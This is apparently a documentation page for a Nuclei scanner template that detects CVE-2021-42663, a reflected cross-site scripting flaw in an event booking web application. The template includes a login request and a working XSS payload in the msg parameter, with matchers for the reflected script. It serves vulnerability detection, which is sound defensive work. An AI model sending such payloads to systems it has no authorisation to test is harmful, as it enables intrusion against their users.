Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting
ID: CVE-2021-42663
Severity: medium
Author: fxploit
Tags: cve2021,cve,xss,online_event_booking_and_reservation_system_project
Description
Section titled “Description”Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker’s choice displays.
YAML Source
Section titled “YAML Source”id: CVE-2021-42663
info: name: Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting author: fxploit severity: medium description: | Sourcecodester Online Event Booking and Reservation System 2.3.0 contains a cross-site scripting vulnerability in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link, the content of the HTML code of the attacker's choice displays. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/0xDeku/CVE-2021-42663 - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html - https://github.com/TheHackingRabbi/CVE-2021-42663 - https://nvd.nist.gov/vuln/detail/CVE-2021-42663 - https://github.com/SYRTI/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.00116 epss-percentile: 0.45225 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: online_event_booking_and_reservation_system_project product: online_event_booking_and_reservation_system tags: cve2021,cve,xss,online_event_booking_and_reservation_system_project
http: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
name={{username}}&pwd={{password}} - | GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}}
host-redirects: true max-redirects: 2
matchers-condition: and matchers: - type: word part: body words: - "</i><script>alert(document.domain)</script></div>"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 490a0046304402201ee8caf93bb8cfeea6aa4575d499957d2c57aef2926e0097c628ca820040911d0220597f235d2778b601f798124ff61e90996c008c650f71928ca8a118a76c1ebbaf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-42663.yaml"